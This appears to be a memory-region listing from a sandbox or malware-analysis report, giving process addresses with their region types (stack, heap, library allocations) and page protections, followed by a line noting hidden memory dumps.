5FB3D3D000
|
stack
|
page read and write
|
||
|
2641E250000
|
heap
|
page execute and read and write
|
||
|
FD6977C000
|
stack
|
page read and write
|
||
|
5FB407E000
|
stack
|
page read and write
|
||
|
1BEE2FA2000
|
heap
|
page read and write
|
||
|
2641E653000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AD10000
|
trusted library allocation
|
page read and write
|
||
|
24FEBB40000
|
heap
|
page read and write
|
||
|
7FFB4A97D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEE2FA2000
|
heap
|
page read and write
|
||
|
7FFB4AB0A000
|
trusted library allocation
|
page read and write
|
||
|
24FEDD80000
|
heap
|
page read and write
|
||
|
7FFB4AB10000
|
trusted library allocation
|
page read and write
|
||
|
1BEE3335000
|
heap
|
page read and write
|
||
|
1BEE2F57000
|
heap
|
page read and write
|
||
|
7FFB4AA36000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEE332D000
|
heap
|
page read and write
|
||
|
1B9C7936000
|
heap
|
page read and write
|
||
|
1BEE30BD000
|
heap
|
page read and write
|
||
|
7FFB4AB80000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AB70000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A954000
|
trusted library allocation
|
page read and write
|
||
|
1BEE3069000
|
heap
|
page read and write
|
||
|
7FFB4AA2C000
|
trusted library allocation
|
page execute and read and write
|
||
|
690F1FD000
|
stack
|
page read and write
|
||
|
7FFB4AC40000
|
trusted library allocation
|
page read and write
|
||
|
24FEDC71000
|
heap
|
page read and write
|
||
|
1B9E0134000
|
heap
|
page read and write
|
||
|
24FED700000
|
heap
|
page execute and read and write
|
||
|
690F27F000
|
stack
|
page read and write
|
||
|
1B9E0162000
|
heap
|
page read and write
|
||
|
1BEE31DA000
|
heap
|
page read and write
|
||
|
7FFB4AAF2000
|
trusted library allocation
|
page read and write
|
||
|
1BEE31C6000
|
heap
|
page read and write
|
||
|
1B9C7E10000
|
heap
|
page execute and read and write
|
||
|
24FEBBC0000
|
heap
|
page read and write
|
||
|
7FFB4AD0B000
|
trusted library allocation
|
page read and write
|
||
|
1B9C9517000
|
trusted library allocation
|
page read and write
|
||
|
690F5B8000
|
stack
|
page read and write
|
||
|
24FED720000
|
heap
|
page read and write
|
||
|
7FFB4ABC0000
|
trusted library allocation
|
page read and write
|
||
|
2641C857000
|
heap
|
page read and write
|
||
|
6F3DF06000
|
stack
|
page read and write
|
||
|
1BEE32EA000
|
heap
|
page read and write
|
||
|
24F803F1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AB50000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AA0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FEBC7B000
|
heap
|
page read and write
|
||
|
26436785000
|
heap
|
page read and write
|
||
|
7FFB4A9CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF4CC920000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AC10000
|
trusted library allocation
|
page read and write
|
||
|
24F805FE000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4ACB0000
|
trusted library allocation
|
page read and write
|
||
|
24F800FD000
|
trusted library allocation
|
page read and write
|
||
|
1B9C975C000
|
trusted library allocation
|
page read and write
|
||
|
5FB3DFE000
|
stack
|
page read and write
|
||
|
1BEE11F0000
|
heap
|
page read and write
|
||
|
690F3F9000
|
stack
|
page read and write
|
||
|
7FFB4AB20000
|
trusted library allocation
|
page execute and read and write
|
||
|
2641E6CC000
|
trusted library allocation
|
page read and write
|
||
|
1B9D7E30000
|
trusted library allocation
|
page read and write
|
||
|
24FEDE60000
|
heap
|
page read and write
|
||
|
1B9C5D10000
|
heap
|
page read and write
|
||
|
1BEE3335000
|
heap
|
page read and write
|
||
|
7FFB4AA06000
|
trusted library allocation
|
page read and write
|
||
|
24F8015B000
|
trusted library allocation
|
page read and write
|
||
|
1BEE309D000
|
heap
|
page read and write
|
||
|
690F43E000
|
stack
|
page read and write
|
||
|
1BEE32E9000
|
heap
|
page read and write
|
||
|
FD6967E000
|
stack
|
page read and write
|
||
|
7FFB4AC80000
|
trusted library allocation
|
page read and write
|
||
|
24FEBD70000
|
heap
|
page read and write
|
||
|
24FEDD60000
|
heap
|
page read and write
|
||
|
7FFB4AC00000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AB10000
|
trusted library allocation
|
page execute and read and write
|
||
|
FD69A79000
|
stack
|
page read and write
|
||
|
24F8040C000
|
trusted library allocation
|
page read and write
|
||
|
26436804000
|
heap
|
page read and write
|
||
|
1BEE32CA000
|
heap
|
page read and write
|
||
|
1B9DFFF0000
|
heap
|
page read and write
|
||
|
7FFB4AB90000
|
trusted library allocation
|
page read and write
|
||
|
1BEE2FC7000
|
heap
|
page read and write
|
||
|
24FED726000
|
heap
|
page read and write
|
||
|
1B9C821E000
|
trusted library allocation
|
page read and write
|
||
|
691028D000
|
stack
|
page read and write
|
||
|
7FFB4AB32000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC60000
|
trusted library allocation
|
page read and write
|
||
|
264369D2000
|
heap
|
page read and write
|
||
|
FD693BE000
|
stack
|
page read and write
|
||
|
1BEE11A0000
|
heap
|
page read and write
|
||
|
7FFB4AB60000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FEDE66000
|
heap
|
page read and write
|
||
|
1B9C86BD000
|
trusted library allocation
|
page read and write
|
||
|
690F37E000
|
stack
|
page read and write
|
||
|
24FED570000
|
trusted library allocation
|
page read and write
|
||
|
1BEE31CF000
|
heap
|
page read and write
|
||
|
1B9D811B000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AB32000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC30000
|
trusted library allocation
|
page read and write
|
||
|
24FEBBBE000
|
heap
|
page read and write
|
||
|
1B9C5DF0000
|
heap
|
page read and write
|
||
|
24FEBC66000
|
heap
|
page read and write
|
||
|
26436890000
|
heap
|
page read and write
|
||
|
1BEE31C9000
|
heap
|
page read and write
|
||
|
7FFB4AA00000
|
trusted library allocation
|
page read and write
|
||
|
1BEE1248000
|
heap
|
page read and write
|
||
|
2641EC5C000
|
trusted library allocation
|
page read and write
|
||
|
5FB45FE000
|
stack
|
page read and write
|
||
|
1BEE12FA000
|
heap
|
page read and write
|
||
|
24FEDE77000
|
heap
|
page read and write
|
||
|
1B9C9506000
|
trusted library allocation
|
page read and write
|
||
|
1BEE30C1000
|
heap
|
page read and write
|
||
|
1BEE10C0000
|
heap
|
page read and write
|
||
|
1B9D8E3B000
|
trusted library allocation
|
page read and write
|
||
|
690F4B7000
|
stack
|
page read and write
|
||
|
1B9C9513000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A960000
|
trusted library allocation
|
page read and write
|
||
|
1B9C9A3A000
|
trusted library allocation
|
page read and write
|
||
|
1BEE31F6000
|
heap
|
page read and write
|
||
|
5FB43FB000
|
stack
|
page read and write
|
||
|
6F3E8FE000
|
stack
|
page read and write
|
||
|
1B9C8246000
|
trusted library allocation
|
page read and write
|
||
|
1BEE12F6000
|
heap
|
page read and write
|
||
|
7FFB4ABE0000
|
trusted library allocation
|
page read and write
|
||
|
24F80001000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AB21000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AB01000
|
trusted library allocation
|
page read and write
|
||
|
2641C8DB000
|
heap
|
page read and write
|
||
|
7FFB4ABE0000
|
trusted library allocation
|
page read and write
|
||
|
1B9DFF13000
|
heap
|
page read and write
|
||
|
1B9C8559000
|
trusted library allocation
|
page read and write
|
||
|
26436990000
|
heap
|
page read and write
|
||
|
1BEE31F6000
|
heap
|
page read and write
|
||
|
7FFB4ACE3000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AB70000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC90000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AA10000
|
trusted library allocation
|
page execute and read and write
|
||
|
5FB40FD000
|
stack
|
page read and write
|
||
|
1BEE1256000
|
heap
|
page read and write
|
||
|
264367A7000
|
heap
|
page read and write
|
||
|
7FFB4A953000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEE2F54000
|
heap
|
page read and write
|
||
|
1BEE30D1000
|
heap
|
page read and write
|
||
|
24F90010000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A973000
|
trusted library allocation
|
page execute and read and write
|
||
|
2641E631000
|
trusted library allocation
|
page read and write
|
||
|
1B9C5EDC000
|
heap
|
page read and write
|
||
|
7FFB4AC30000
|
trusted library allocation
|
page read and write
|
||
|
1BEE3061000
|
heap
|
page read and write
|
||
|
7FFB4AD03000
|
trusted library allocation
|
page read and write
|
||
|
6F3E5FE000
|
stack
|
page read and write
|
||
|
5FB3CB3000
|
stack
|
page read and write
|
||
|
7FFB4AB12000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AA10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B9C6194000
|
heap
|
page read and write
|
||
|
1BEE3361000
|
heap
|
page read and write
|
||
|
FD69BFE000
|
stack
|
page read and write
|
||
|
2641E741000
|
trusted library allocation
|
page read and write
|
||
|
1B9C7C8F000
|
heap
|
page read and write
|
||
|
1BEE3055000
|
heap
|
page read and write
|
||
|
7FFB4AC20000
|
trusted library allocation
|
page read and write
|
||
|
FD69CFE000
|
stack
|
page read and write
|
||
|
2643677C000
|
heap
|
page read and write
|
||
|
6F3EAFE000
|
stack
|
page read and write
|
||
|
690F539000
|
stack
|
page read and write
|
||
|
1BEE31CA000
|
heap
|
page read and write
|
||
|
1BEE3418000
|
heap
|
page read and write
|
||
|
690F63E000
|
stack
|
page read and write
|
||
|
24FEBBC6000
|
heap
|
page read and write
|
||
|
FD699F6000
|
stack
|
page read and write
|
||
|
7FFB4AB2A000
|
trusted library allocation
|
page read and write
|
||
|
1B9DFF09000
|
heap
|
page read and write
|
||
|
1B9E0143000
|
heap
|
page read and write
|
||
|
FD698FE000
|
stack
|
page read and write
|
||
|
1BEE30D1000
|
heap
|
page read and write
|
||
|
1BEE11C0000
|
heap
|
page read and write
|
||
|
1BEE2F97000
|
heap
|
page read and write
|
||
|
1B9C8242000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AC20000
|
trusted library allocation
|
page read and write
|
||
|
1B9D843B000
|
trusted library allocation
|
page read and write
|
||
|
1B9C5E90000
|
trusted library allocation
|
page read and write
|
||
|
1BEE31C6000
|
heap
|
page read and write
|
||
|
1BEE2FC9000
|
heap
|
page read and write
|
||
|
1BEE3088000
|
heap
|
page read and write
|
||
|
24FED5A0000
|
heap
|
page readonly
|
||
|
2641C6B0000
|
heap
|
page read and write
|
||
|
1B9C5EA9000
|
heap
|
page read and write
|
||
|
1BEE12D8000
|
heap
|
page read and write
|
||
|
1BEE332E000
|
heap
|
page read and write
|
||
|
1BEE1227000
|
heap
|
page read and write
|
||
|
1BEE2F62000
|
heap
|
page read and write
|
||
|
1BEE32EF000
|
heap
|
page read and write
|
||
|
1BEE2F67000
|
heap
|
page read and write
|
||
|
FD69AFE000
|
stack
|
page read and write
|
||
|
6F3EBFB000
|
stack
|
page read and write
|
||
|
7FFB4AB40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B9C5EED000
|
heap
|
page read and write
|
||
|
2641E2E0000
|
heap
|
page read and write
|
||
|
1B9C98A8000
|
trusted library allocation
|
page read and write
|
||
|
2641E257000
|
heap
|
page execute and read and write
|
||
|
2641E73B000
|
trusted library allocation
|
page read and write
|
||
|
1BEE2F77000
|
heap
|
page read and write
|
||
|
1B9E00FF000
|
heap
|
page read and write
|
There are 526 hidden memdumps, click here to show them.